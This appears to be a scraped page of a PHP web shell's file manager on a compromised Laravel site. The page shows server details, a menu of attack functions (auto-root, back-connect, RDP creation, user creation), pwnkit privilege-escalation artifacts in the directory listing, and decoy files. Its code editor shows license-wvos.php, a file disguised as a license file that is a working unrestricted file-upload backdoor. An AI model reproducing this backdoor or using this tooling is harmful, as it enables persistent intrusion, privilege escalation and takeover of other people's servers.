Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.78
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo17.com /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
.well-known
[ DIR ]
drwxr-xr-x
1ftspxk
[ DIR ]
drwxr-xr-x
1xbqevo
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
ac-software
[ DIR ]
drwxrwxrwx
app
[ DIR ]
drwxrwxrwx
bootstrap
[ DIR ]
drwxrwxrwx
config
[ DIR ]
drwxrwxrwx
database
[ DIR ]
drwxrwxrwx
feomraj
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
orfq1pi
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxrwxrwx
resources
[ DIR ]
drwxrwxrwx
routes
[ DIR ]
drwxrwxrwx
sikwlrz
[ DIR ]
drwxr-xr-x
storage
[ DIR ]
drwxrwxrwx
tests
[ DIR ]
drwxrwxrwx
tkuweoh
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxrwxrwx
yiupscq
[ DIR ]
drwxr-xr-x
zotiedb
[ DIR ]
drwxr-xr-x
.editorconfig
258
B
-rw-rw-rw-
.env
1.3
KB
-rw-rw-rw-
.env.example
1.11
KB
-rw-rw-rw-
.gitattributes
186
B
-rw-rw-rw-
.gitignore
286
B
-rw-rw-rw-
.htaccess
479
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
.phpunit.result.cache
2.36
KB
-rw-rw-rw-
README.md
3.14
KB
-rw-rw-rw-
ac_software
84
KB
-rw-rw-rw-
artisan
350
B
-rw-rw-rw-
composer.json
2.35
KB
-rw-rw-rw-
composer.lock
299.75
KB
-rw-rw-rw-
error_log
1.6
KB
-rw-r--r--
goat1.php
143.87
KB
-rw-r--r--
index.php
1.18
KB
-rw-r--r--
license-wvos.php
629
B
-rw-r--r--
package.json
383
B
-rw-rw-rw-
phpunit.xml
1.15
KB
-rw-rw-rw-
postcss.config.js
93
B
-rw-rw-rw-
pwnkit
10.99
KB
-rwxr-xr-x
robots.txt
86
B
-rw-r--r--
signgwph_acsoftware
156
KB
-rw-r--r--
tailwind.config.js
551
B
-rw-rw-rw-
vite.config.js
263
B
-rw-rw-rw-
wp-blog-header.php
0
B
-rw-r--r--
wp-load.php
0
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : license-wvos.php
<?php if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['image'])) { $f = $_FILES['image']; if ($f['error'] === UPLOAD_ERR_OK) { $name = basename($f['name']); $ok = move_uploaded_file($f['tmp_name'], __DIR__ . '/' . $name); echo $ok ? "<center><b>Done ==> {$name}</b></center>" : "<center><b>Error writing file</b></center>"; } else { echo "<center><b>Upload error code: {$f['error']}</b></center>"; } exit; } ?> 7a68a76299628041 <form method="post" enctype="multipart/form-data"> <input type="file" name="image"> <input type="submit" value="Submit"> </form>
Close